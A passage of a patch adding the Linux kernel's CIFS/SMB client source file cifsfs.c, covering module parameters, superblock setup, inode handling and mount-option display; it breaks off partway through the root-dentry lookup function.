++/* Note that BB means BUGBUG (ie something to fix eventually) */
++
++#include <linux/module.h>
++#include <linux/fs.h>
++#include <linux/mount.h>
++#include <linux/slab.h>
++#include <linux/init.h>
++#include <linux/list.h>
++#include <linux/seq_file.h>
++#include <linux/vfs.h>
++#include <linux/mempool.h>
++#include <linux/delay.h>
++#include <linux/kthread.h>
++#include <linux/freezer.h>
++#include <linux/namei.h>
++#include <linux/random.h>
++#include <linux/uuid.h>
++#include <linux/xattr.h>
++#include <uapi/linux/magic.h>
++#include <net/ipv6.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#define DECLARE_GLOBALS_HERE
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include <linux/mm.h>
++#include <linux/key-type.h>
++#include "cifs_spnego.h"
++#include "fscache.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++#ifdef CONFIG_CIFS_SWN_UPCALL
++#include "netlink.h"
++#endif
++#include "fs_context.h"
++#include "cached_dir.h"
++
++/*
++ * DOS dates from 1980/1/1 through 2107/12/31
++ * Protocol specifications indicate the range should be to 119, which
++ * limits maximum year to 2099. But this range has not been checked.
++ */
++#define SMB_DATE_MAX (127<<9 | 12<<5 | 31)
++#define SMB_DATE_MIN (0<<9 | 1<<5 | 1)
++#define SMB_TIME_MAX (23<<11 | 59<<5 | 29)
++
++int cifsFYI = 0;
++bool traceSMB;
++bool enable_oplocks = true;
++bool linuxExtEnabled = true;
++bool lookupCacheEnabled = true;
++bool disable_legacy_dialects; /* false by default */
++bool enable_gcm_256 = true;
++bool require_gcm_256; /* false by default */
++bool enable_negotiate_signing; /* false by default */
++unsigned int global_secflags = CIFSSEC_DEF;
++/* unsigned int ntlmv2_support = 0; */
++unsigned int sign_CIFS_PDUs = 1;
++
++/*
++ * Global transaction id (XID) information
++ */
++unsigned int GlobalCurrentXid;	/* protected by GlobalMid_Sem */
++unsigned int GlobalTotalActiveXid; /* prot by GlobalMid_Sem */
++unsigned int GlobalMaxActiveXid;	/* prot by GlobalMid_Sem */
++spinlock_t GlobalMid_Lock; /* protects above & list operations on midQ entries */
++
++/*
++ *  Global counters, updated atomically
++ */
++atomic_t sesInfoAllocCount;
++atomic_t tconInfoAllocCount;
++atomic_t tcpSesNextId;
++atomic_t tcpSesAllocCount;
++atomic_t tcpSesReconnectCount;
++atomic_t tconInfoReconnectCount;
++
++atomic_t mid_count;
++atomic_t buf_alloc_count;
++atomic_t small_buf_alloc_count;
++#ifdef CONFIG_CIFS_STATS2
++atomic_t total_buf_alloc_count;
++atomic_t total_small_buf_alloc_count;
++#endif/* STATS2 */
++struct list_head	cifs_tcp_ses_list;
++spinlock_t		cifs_tcp_ses_lock;
++static const struct super_operations cifs_super_ops;
++unsigned int CIFSMaxBufSize = CIFS_MAX_MSGSIZE;
++module_param(CIFSMaxBufSize, uint, 0444);
++MODULE_PARM_DESC(CIFSMaxBufSize, "Network buffer size (not including header) "
++				 "for CIFS requests. "
++				 "Default: 16384 Range: 8192 to 130048");
++unsigned int cifs_min_rcv = CIFS_MIN_RCV_POOL;
++module_param(cifs_min_rcv, uint, 0444);
++MODULE_PARM_DESC(cifs_min_rcv, "Network buffers in pool. Default: 4 Range: "
++				"1 to 64");
++unsigned int cifs_min_small = 30;
++module_param(cifs_min_small, uint, 0444);
++MODULE_PARM_DESC(cifs_min_small, "Small network buffers in pool. Default: 30 "
++				 "Range: 2 to 256");
++unsigned int cifs_max_pending = CIFS_MAX_REQ;
++module_param(cifs_max_pending, uint, 0444);
++MODULE_PARM_DESC(cifs_max_pending, "Simultaneous requests to server for "
++				   "CIFS/SMB1 dialect (N/A for SMB3) "
++				   "Default: 32767 Range: 2 to 32767.");
++#ifdef CONFIG_CIFS_STATS2
++unsigned int slow_rsp_threshold = 1;
++module_param(slow_rsp_threshold, uint, 0644);
++MODULE_PARM_DESC(slow_rsp_threshold, "Amount of time (in seconds) to wait "
++				   "before logging that a response is delayed. "
++				   "Default: 1 (if set to 0 disables msg).");
++#endif /* STATS2 */
++
++module_param(enable_oplocks, bool, 0644);
++MODULE_PARM_DESC(enable_oplocks, "Enable or disable oplocks. Default: y/Y/1");
++
++module_param(enable_gcm_256, bool, 0644);
++MODULE_PARM_DESC(enable_gcm_256, "Enable requesting strongest (256 bit) GCM encryption. Default: n/N/0");
++
++module_param(require_gcm_256, bool, 0644);
++MODULE_PARM_DESC(require_gcm_256, "Require strongest (256 bit) GCM encryption. Default: n/N/0");
++
++module_param(enable_negotiate_signing, bool, 0644);
++MODULE_PARM_DESC(enable_negotiate_signing, "Enable negotiating packet signing algorithm with server. Default: n/N/0");
++
++module_param(disable_legacy_dialects, bool, 0644);
++MODULE_PARM_DESC(disable_legacy_dialects, "To improve security it may be "
++				  "helpful to restrict the ability to "
++				  "override the default dialects (SMB2.1, "
++				  "SMB3 and SMB3.02) on mount with old "
++				  "dialects (CIFS/SMB1 and SMB2) since "
++				  "vers=1.0 (CIFS/SMB1) and vers=2.0 are weaker"
++				  " and less secure. Default: n/N/0");
++
++extern mempool_t *cifs_sm_req_poolp;
++extern mempool_t *cifs_req_poolp;
++extern mempool_t *cifs_mid_poolp;
++
++struct workqueue_struct	*cifsiod_wq;
++struct workqueue_struct	*decrypt_wq;
++struct workqueue_struct	*fileinfo_put_wq;
++struct workqueue_struct	*cifsoplockd_wq;
++struct workqueue_struct	*deferredclose_wq;
++__u32 cifs_lock_secret;
++
++/*
++ * Bumps refcount for cifs super block.
++ * Note that it should be only called if a referece to VFS super block is
++ * already held, e.g. in open-type syscalls context. Otherwise it can race with
++ * atomic_dec_and_test in deactivate_locked_super.
++ */
++void
++cifs_sb_active(struct super_block *sb)
++{
++	struct cifs_sb_info *server = CIFS_SB(sb);
++
++	if (atomic_inc_return(&server->active) == 1)
++		atomic_inc(&sb->s_active);
++}
++
++void
++cifs_sb_deactive(struct super_block *sb)
++{
++	struct cifs_sb_info *server = CIFS_SB(sb);
++
++	if (atomic_dec_and_test(&server->active))
++		deactivate_super(sb);
++}
++
++static int
++cifs_read_super(struct super_block *sb)
++{
++	struct inode *inode;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct timespec64 ts;
++	int rc = 0;
++
++	cifs_sb = CIFS_SB(sb);
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIXACL)
++		sb->s_flags |= SB_POSIXACL;
++
++	if (tcon->snapshot_time)
++		sb->s_flags |= SB_RDONLY;
++
++	if (tcon->ses->capabilities & tcon->ses->server->vals->cap_large_files)
++		sb->s_maxbytes = MAX_LFS_FILESIZE;
++	else
++		sb->s_maxbytes = MAX_NON_LFS;
++
++	/*
++	 * Some very old servers like DOS and OS/2 used 2 second granularity
++	 * (while all current servers use 100ns granularity - see MS-DTYP)
++	 * but 1 second is the maximum allowed granularity for the VFS
++	 * so for old servers set time granularity to 1 second while for
++	 * everything else (current servers) set it to 100ns.
++	 */
++	if ((tcon->ses->server->vals->protocol_id == SMB10_PROT_ID) &&
++	    ((tcon->ses->capabilities &
++	      tcon->ses->server->vals->cap_nt_find) == 0) &&
++	    !tcon->unix_ext) {
++		sb->s_time_gran = 1000000000; /* 1 second is max allowed gran */
++		ts = cnvrtDosUnixTm(cpu_to_le16(SMB_DATE_MIN), 0, 0);
++		sb->s_time_min = ts.tv_sec;
++		ts = cnvrtDosUnixTm(cpu_to_le16(SMB_DATE_MAX),
++				    cpu_to_le16(SMB_TIME_MAX), 0);
++		sb->s_time_max = ts.tv_sec;
++	} else {
++		/*
++		 * Almost every server, including all SMB2+, uses DCE TIME
++		 * ie 100 nanosecond units, since 1601.  See MS-DTYP and MS-FSCC
++		 */
++		sb->s_time_gran = 100;
++		ts = cifs_NTtimeToUnix(0);
++		sb->s_time_min = ts.tv_sec;
++		ts = cifs_NTtimeToUnix(cpu_to_le64(S64_MAX));
++		sb->s_time_max = ts.tv_sec;
++	}
++
++	sb->s_magic = CIFS_SUPER_MAGIC;
++	sb->s_op = &cifs_super_ops;
++	sb->s_xattr = cifs_xattr_handlers;
++	rc = super_setup_bdi(sb);
++	if (rc)
++		goto out_no_root;
++	/* tune readahead according to rsize if readahead size not set on mount */
++	if (cifs_sb->ctx->rsize == 0)
++		cifs_sb->ctx->rsize =
++			tcon->ses->server->ops->negotiate_rsize(tcon, cifs_sb->ctx);
++	if (cifs_sb->ctx->rasize)
++		sb->s_bdi->ra_pages = cifs_sb->ctx->rasize / PAGE_SIZE;
++	else
++		sb->s_bdi->ra_pages = cifs_sb->ctx->rsize / PAGE_SIZE;
++
++	sb->s_blocksize = CIFS_MAX_MSGSIZE;
++	sb->s_blocksize_bits = 14;	/* default 2**14 = CIFS_MAX_MSGSIZE */
++	inode = cifs_root_iget(sb);
++
++	if (IS_ERR(inode)) {
++		rc = PTR_ERR(inode);
++		goto out_no_root;
++	}
++
++	if (tcon->nocase)
++		sb->s_d_op = &cifs_ci_dentry_ops;
++	else
++		sb->s_d_op = &cifs_dentry_ops;
++
++	sb->s_root = d_make_root(inode);
++	if (!sb->s_root) {
++		rc = -ENOMEM;
++		goto out_no_root;
++	}
++
++#ifdef CONFIG_CIFS_NFSD_EXPORT
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
++		cifs_dbg(FYI, "export ops supported\n");
++		sb->s_export_op = &cifs_export_ops;
++	}
++#endif /* CONFIG_CIFS_NFSD_EXPORT */
++
++	return 0;
++
++out_no_root:
++	cifs_dbg(VFS, "%s: get root inode failed\n", __func__);
++	return rc;
++}
++
++static void cifs_kill_sb(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++
++	/*
++	 * We ned to release all dentries for the cached directories
++	 * before we kill the sb.
++	 */
++	if (cifs_sb->root) {
++		close_all_cached_dirs(cifs_sb);
++
++		/* finally release root dentry */
++		dput(cifs_sb->root);
++		cifs_sb->root = NULL;
++	}
++
++	kill_anon_super(sb);
++	cifs_umount(cifs_sb);
++}
++
++static int
++cifs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int xid;
++	int rc = 0;
++
++	xid = get_xid();
++
++	if (le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength) > 0)
++		buf->f_namelen =
++		       le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength);
++	else
++		buf->f_namelen = PATH_MAX;
++
++	buf->f_fsid.val[0] = tcon->vol_serial_number;
++	/* are using part of create time for more randomness, see man statfs */
++	buf->f_fsid.val[1] =  (int)le64_to_cpu(tcon->vol_create_time);
++
++	buf->f_files = 0;	/* undefined */
++	buf->f_ffree = 0;	/* unlimited */
++
++	if (server->ops->queryfs)
++		rc = server->ops->queryfs(xid, tcon, cifs_sb, buf);
++
++	free_xid(xid);
++	return rc;
++}
++
++static long cifs_fallocate(struct file *file, int mode, loff_t off, loff_t len)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	if (server->ops->fallocate)
++		return server->ops->fallocate(file, tcon, mode, off, len);
++
++	return -EOPNOTSUPP;
++}
++
++static int cifs_permission(struct user_namespace *mnt_userns,
++			   struct inode *inode, int mask)
++{
++	struct cifs_sb_info *cifs_sb;
++
++	cifs_sb = CIFS_SB(inode->i_sb);
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM) {
++		if ((mask & MAY_EXEC) && !execute_ok(inode))
++			return -EACCES;
++		else
++			return 0;
++	} else /* file mode might have been restricted at mount time
++		on the client (above and beyond ACL on servers) for
++		servers which do not support setting and viewing mode bits,
++		so allowing client to check permissions is useful */
++		return generic_permission(&init_user_ns, inode, mask);
++}
++
++static struct kmem_cache *cifs_inode_cachep;
++static struct kmem_cache *cifs_req_cachep;
++static struct kmem_cache *cifs_mid_cachep;
++static struct kmem_cache *cifs_sm_req_cachep;
++mempool_t *cifs_sm_req_poolp;
++mempool_t *cifs_req_poolp;
++mempool_t *cifs_mid_poolp;
++
++static struct inode *
++cifs_alloc_inode(struct super_block *sb)
++{
++	struct cifsInodeInfo *cifs_inode;
++	cifs_inode = alloc_inode_sb(sb, cifs_inode_cachep, GFP_KERNEL);
++	if (!cifs_inode)
++		return NULL;
++	cifs_inode->cifsAttrs = 0x20;	/* default */
++	cifs_inode->time = 0;
++	/*
++	 * Until the file is open and we have gotten oplock info back from the
++	 * server, can not assume caching of file data or metadata.
++	 */
++	cifs_set_oplock_level(cifs_inode, 0);
++	cifs_inode->flags = 0;
++	spin_lock_init(&cifs_inode->writers_lock);
++	cifs_inode->writers = 0;
++	cifs_inode->netfs.inode.i_blkbits = 14;  /* 2**14 = CIFS_MAX_MSGSIZE */
++	cifs_inode->server_eof = 0;
++	cifs_inode->uniqueid = 0;
++	cifs_inode->createtime = 0;
++	cifs_inode->epoch = 0;
++	spin_lock_init(&cifs_inode->open_file_lock);
++	generate_random_uuid(cifs_inode->lease_key);
++	cifs_inode->symlink_target = NULL;
++
++	/*
++	 * Can not set i_flags here - they get immediately overwritten to zero
++	 * by the VFS.
++	 */
++	/* cifs_inode->netfs.inode.i_flags = S_NOATIME | S_NOCMTIME; */
++	INIT_LIST_HEAD(&cifs_inode->openFileList);
++	INIT_LIST_HEAD(&cifs_inode->llist);
++	INIT_LIST_HEAD(&cifs_inode->deferred_closes);
++	spin_lock_init(&cifs_inode->deferred_lock);
++	return &cifs_inode->netfs.inode;
++}
++
++static void
++cifs_free_inode(struct inode *inode)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++
++	if (S_ISLNK(inode->i_mode))
++		kfree(cinode->symlink_target);
++	kmem_cache_free(cifs_inode_cachep, cinode);
++}
++
++static void
++cifs_evict_inode(struct inode *inode)
++{
++	truncate_inode_pages_final(&inode->i_data);
++	if (inode->i_state & I_PINNING_FSCACHE_WB)
++		cifs_fscache_unuse_inode_cookie(inode, true);
++	cifs_fscache_release_inode_cookie(inode);
++	clear_inode(inode);
++}
++
++static void
++cifs_show_address(struct seq_file *s, struct TCP_Server_Info *server)
++{
++	struct sockaddr_in *sa = (struct sockaddr_in *) &server->dstaddr;
++	struct sockaddr_in6 *sa6 = (struct sockaddr_in6 *) &server->dstaddr;
++
++	seq_puts(s, ",addr=");
++
++	switch (server->dstaddr.ss_family) {
++	case AF_INET:
++		seq_printf(s, "%pI4", &sa->sin_addr.s_addr);
++		break;
++	case AF_INET6:
++		seq_printf(s, "%pI6", &sa6->sin6_addr.s6_addr);
++		if (sa6->sin6_scope_id)
++			seq_printf(s, "%%%u", sa6->sin6_scope_id);
++		break;
++	default:
++		seq_puts(s, "(unknown)");
++	}
++	if (server->rdma)
++		seq_puts(s, ",rdma");
++}
++
++static void
++cifs_show_security(struct seq_file *s, struct cifs_ses *ses)
++{
++	if (ses->sectype == Unspecified) {
++		if (ses->user_name == NULL)
++			seq_puts(s, ",sec=none");
++		return;
++	}
++
++	seq_puts(s, ",sec=");
++
++	switch (ses->sectype) {
++	case NTLMv2:
++		seq_puts(s, "ntlmv2");
++		break;
++	case Kerberos:
++		seq_puts(s, "krb5");
++		break;
++	case RawNTLMSSP:
++		seq_puts(s, "ntlmssp");
++		break;
++	default:
++		/* shouldn't ever happen */
++		seq_puts(s, "unknown");
++		break;
++	}
++
++	if (ses->sign)
++		seq_puts(s, "i");
++
++	if (ses->sectype == Kerberos)
++		seq_printf(s, ",cruid=%u",
++			   from_kuid_munged(&init_user_ns, ses->cred_uid));
++}
++
++static void
++cifs_show_cache_flavor(struct seq_file *s, struct cifs_sb_info *cifs_sb)
++{
++	seq_puts(s, ",cache=");
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO)
++		seq_puts(s, "strict");
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO)
++		seq_puts(s, "none");
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE)
++		seq_puts(s, "singleclient"); /* assume only one client access */
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE)
++		seq_puts(s, "ro"); /* read only caching assumed */
++	else
++		seq_puts(s, "loose");
++}
++
++/*
++ * cifs_show_devname() is used so we show the mount device name with correct
++ * format (e.g. forward slashes vs. back slashes) in /proc/mounts
++ */
++static int cifs_show_devname(struct seq_file *m, struct dentry *root)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
++	char *devname = kstrdup(cifs_sb->ctx->source, GFP_KERNEL);
++
++	if (devname == NULL)
++		seq_puts(m, "none");
++	else {
++		convert_delimiter(devname, '/');
++		/* escape all spaces in share names */
++		seq_escape(m, devname, " \t");
++		kfree(devname);
++	}
++	return 0;
++}
++
++/*
++ * cifs_show_options() is for displaying mount options in /proc/mounts.
++ * Not all settable options are displayed but most of the important
++ * ones are.
++ */
++static int
++cifs_show_options(struct seq_file *s, struct dentry *root)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	struct sockaddr *srcaddr;
++	srcaddr = (struct sockaddr *)&tcon->ses->server->srcaddr;
++
++	seq_show_option(s, "vers", tcon->ses->server->vals->version_string);
++	cifs_show_security(s, tcon->ses);
++	cifs_show_cache_flavor(s, cifs_sb);
++
++	if (tcon->no_lease)
++		seq_puts(s, ",nolease");
++	if (cifs_sb->ctx->multiuser)
++		seq_puts(s, ",multiuser");
++	else if (tcon->ses->user_name)
++		seq_show_option(s, "username", tcon->ses->user_name);
++
++	if (tcon->ses->domainName && tcon->ses->domainName[0] != 0)
++		seq_show_option(s, "domain", tcon->ses->domainName);
++
++	if (srcaddr->sa_family != AF_UNSPEC) {
++		struct sockaddr_in *saddr4;
++		struct sockaddr_in6 *saddr6;
++		saddr4 = (struct sockaddr_in *)srcaddr;
++		saddr6 = (struct sockaddr_in6 *)srcaddr;
++		if (srcaddr->sa_family == AF_INET6)
++			seq_printf(s, ",srcaddr=%pI6c",
++				   &saddr6->sin6_addr);
++		else if (srcaddr->sa_family == AF_INET)
++			seq_printf(s, ",srcaddr=%pI4",
++				   &saddr4->sin_addr.s_addr);
++		else
++			seq_printf(s, ",srcaddr=BAD-AF:%i",
++				   (int)(srcaddr->sa_family));
++	}
++
++	seq_printf(s, ",uid=%u",
++		   from_kuid_munged(&init_user_ns, cifs_sb->ctx->linux_uid));
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID)
++		seq_puts(s, ",forceuid");
++	else
++		seq_puts(s, ",noforceuid");
++
++	seq_printf(s, ",gid=%u",
++		   from_kgid_munged(&init_user_ns, cifs_sb->ctx->linux_gid));
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID)
++		seq_puts(s, ",forcegid");
++	else
++		seq_puts(s, ",noforcegid");
++
++	cifs_show_address(s, tcon->ses->server);
++
++	if (!tcon->unix_ext)
++		seq_printf(s, ",file_mode=0%ho,dir_mode=0%ho",
++					   cifs_sb->ctx->file_mode,
++					   cifs_sb->ctx->dir_mode);
++	if (cifs_sb->ctx->iocharset)
++		seq_printf(s, ",iocharset=%s", cifs_sb->ctx->iocharset);
++	if (tcon->seal)
++		seq_puts(s, ",seal");
++	else if (tcon->ses->server->ignore_signature)
++		seq_puts(s, ",signloosely");
++	if (tcon->nocase)
++		seq_puts(s, ",nocase");
++	if (tcon->nodelete)
++		seq_puts(s, ",nodelete");
++	if (cifs_sb->ctx->no_sparse)
++		seq_puts(s, ",nosparse");
++	if (tcon->local_lease)
++		seq_puts(s, ",locallease");
++	if (tcon->retry)
++		seq_puts(s, ",hard");
++	else
++		seq_puts(s, ",soft");
++	if (tcon->use_persistent)
++		seq_puts(s, ",persistenthandles");
++	else if (tcon->use_resilient)
++		seq_puts(s, ",resilienthandles");
++	if (tcon->posix_extensions)
++		seq_puts(s, ",posix");
++	else if (tcon->unix_ext)
++		seq_puts(s, ",unix");
++	else
++		seq_puts(s, ",nounix");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS)
++		seq_puts(s, ",nodfs");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)
++		seq_puts(s, ",posixpaths");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID)
++		seq_puts(s, ",setuids");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
++		seq_puts(s, ",idsfromsid");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
++		seq_puts(s, ",serverino");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
++		seq_puts(s, ",rwpidforward");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL)
++		seq_puts(s, ",forcemand");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
++		seq_puts(s, ",nouser_xattr");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
++		seq_puts(s, ",mapchars");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
++		seq_puts(s, ",mapposix");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL)
++		seq_puts(s, ",sfu");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
++		seq_puts(s, ",nobrl");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_HANDLE_CACHE)
++		seq_puts(s, ",nohandlecache");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)
++		seq_puts(s, ",modefromsid");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL)
++		seq_puts(s, ",cifsacl");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
++		seq_puts(s, ",dynperm");
++	if (root->d_sb->s_flags & SB_POSIXACL)
++		seq_puts(s, ",acl");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS)
++		seq_puts(s, ",mfsymlinks");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_FSCACHE)
++		seq_puts(s, ",fsc");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)
++		seq_puts(s, ",nostrictsync");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
++		seq_puts(s, ",noperm");
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPUID)
++		seq_printf(s, ",backupuid=%u",
++			   from_kuid_munged(&init_user_ns,
++					    cifs_sb->ctx->backupuid));
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPGID)
++		seq_printf(s, ",backupgid=%u",
++			   from_kgid_munged(&init_user_ns,
++					    cifs_sb->ctx->backupgid));
++
++	seq_printf(s, ",rsize=%u", cifs_sb->ctx->rsize);
++	seq_printf(s, ",wsize=%u", cifs_sb->ctx->wsize);
++	seq_printf(s, ",bsize=%u", cifs_sb->ctx->bsize);
++	if (cifs_sb->ctx->rasize)
++		seq_printf(s, ",rasize=%u", cifs_sb->ctx->rasize);
++	if (tcon->ses->server->min_offload)
++		seq_printf(s, ",esize=%u", tcon->ses->server->min_offload);
++	seq_printf(s, ",echo_interval=%lu",
++			tcon->ses->server->echo_interval / HZ);
++
++	/* Only display the following if overridden on mount */
++	if (tcon->ses->server->max_credits != SMB2_MAX_CREDITS_AVAILABLE)
++		seq_printf(s, ",max_credits=%u", tcon->ses->server->max_credits);
++	if (tcon->ses->server->tcp_nodelay)
++		seq_puts(s, ",tcpnodelay");
++	if (tcon->ses->server->noautotune)
++		seq_puts(s, ",noautotune");
++	if (tcon->ses->server->noblocksnd)
++		seq_puts(s, ",noblocksend");
++
++	if (tcon->snapshot_time)
++		seq_printf(s, ",snapshot=%llu", tcon->snapshot_time);
++	if (tcon->handle_timeout)
++		seq_printf(s, ",handletimeout=%u", tcon->handle_timeout);
++
++	/*
++	 * Display file and directory attribute timeout in seconds.
++	 * If file and directory attribute timeout the same then actimeo
++	 * was likely specified on mount
++	 */
++	if (cifs_sb->ctx->acdirmax == cifs_sb->ctx->acregmax)
++		seq_printf(s, ",actimeo=%lu", cifs_sb->ctx->acregmax / HZ);
++	else {
++		seq_printf(s, ",acdirmax=%lu", cifs_sb->ctx->acdirmax / HZ);
++		seq_printf(s, ",acregmax=%lu", cifs_sb->ctx->acregmax / HZ);
++	}
++	seq_printf(s, ",closetimeo=%lu", cifs_sb->ctx->closetimeo / HZ);
++
++	if (tcon->ses->chan_max > 1)
++		seq_printf(s, ",multichannel,max_channels=%zu",
++			   tcon->ses->chan_max);
++
++	if (tcon->use_witness)
++		seq_puts(s, ",witness");
++
++	return 0;
++}
++
++static void cifs_umount_begin(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon;
++
++	if (cifs_sb == NULL)
++		return;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	spin_lock(&cifs_tcp_ses_lock);
++	spin_lock(&tcon->tc_lock);
++	if ((tcon->tc_count > 1) || (tcon->status == TID_EXITING)) {
++		/* we have other mounts to same share or we have
++		   already tried to umount this and woken up
++		   all waiting network requests, nothing to do */
++		spin_unlock(&tcon->tc_lock);
++		spin_unlock(&cifs_tcp_ses_lock);
++		return;
++	}
++	/*
++	 * can not set tcon->status to TID_EXITING yet since we don't know if umount -f will
++	 * fail later (e.g. due to open files).  TID_EXITING will be set just before tdis req sent
++	 */
++	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	cifs_close_all_deferred_files(tcon);
++	/* cancel_brl_requests(tcon); */ /* BB mark all brl mids as exiting */
++	/* cancel_notify_requests(tcon); */
++	if (tcon->ses && tcon->ses->server) {
++		cifs_dbg(FYI, "wake up tasks now - umount begin not complete\n");
++		wake_up_all(&tcon->ses->server->request_q);
++		wake_up_all(&tcon->ses->server->response_q);
++		msleep(1); /* yield */
++		/* we have to kick the requests once more */
++		wake_up_all(&tcon->ses->server->response_q);
++		msleep(1);
++	}
++
++	return;
++}
++
++static int cifs_freeze(struct super_block *sb)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_tcon *tcon;
++
++	if (cifs_sb == NULL)
++		return 0;
++
++	tcon = cifs_sb_master_tcon(cifs_sb);
++
++	cifs_close_all_deferred_files(tcon);
++	return 0;
++}
++
++#ifdef CONFIG_CIFS_STATS2
++static int cifs_show_stats(struct seq_file *s, struct dentry *root)
++{
++	/* BB FIXME */
++	return 0;
++}
++#endif
++
++static int cifs_write_inode(struct inode *inode, struct writeback_control *wbc)
++{
++	fscache_unpin_writeback(wbc, cifs_inode_cookie(inode));
++	return 0;
++}
++
++static int cifs_drop_inode(struct inode *inode)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++
++	/* no serverino => unconditional eviction */
++	return !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) ||
++		generic_drop_inode(inode);
++}
++
++static const struct super_operations cifs_super_ops = {
++	.statfs = cifs_statfs,
++	.alloc_inode = cifs_alloc_inode,
++	.write_inode	= cifs_write_inode,
++	.free_inode = cifs_free_inode,
++	.drop_inode	= cifs_drop_inode,
++	.evict_inode	= cifs_evict_inode,
++/*	.show_path	= cifs_show_path, */ /* Would we ever need show path? */
++	.show_devname   = cifs_show_devname,
++/*	.delete_inode	= cifs_delete_inode,  */  /* Do not need above
++	function unless later we add lazy close of inodes or unless the
++	kernel forgets to call us with the same number of releases (closes)
++	as opens */
++	.show_options = cifs_show_options,
++	.umount_begin   = cifs_umount_begin,
++	.freeze_fs      = cifs_freeze,
++#ifdef CONFIG_CIFS_STATS2
++	.show_stats = cifs_show_stats,
++#endif
++};
++
++/*
++ * Get root dentry from superblock according to prefix path mount option.
++ * Return dentry with refcount + 1 on success and NULL otherwise.
++ */
++static struct dentry *
++cifs_get_root(struct smb3_fs_context *ctx, struct super_block *sb)
++{
++	struct dentry *dentry;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	char *full_path = NULL;
++	char *s, *p;
++	char sep;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
++		return dget(sb->s_root);
++
++	full_path = cifs_build_path_to_root(ctx, cifs_sb,
++				cifs_sb_master_tcon(cifs_sb), 0);
++	if (full_path == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	cifs_dbg(FYI, "Get root dentry for %s\n", full_path);
++
++	sep = CIFS_DIR_SEP(cifs_sb);
++	dentry = dget(sb->s_root);
++	s = full_path;
++
++	do {
++		struct inode *dir = d_inode(dentry);
++		struct dentry *child;
++
++		if (!S_ISDIR(dir->i_mode)) {
++			dput(dentry);
++			dentry = ERR_PTR(-ENOTDIR);
++			break;
++		}
++
++		/* skip separators */
++		while (*s == sep)
++			s++;
++		if (!*s)
++			break;
++		p = s++;
++		/* next separator */
++		while (*s && *s != sep)
++			s++;
++
++		child = lookup_positive_unlocked(p, dentry, s - p);
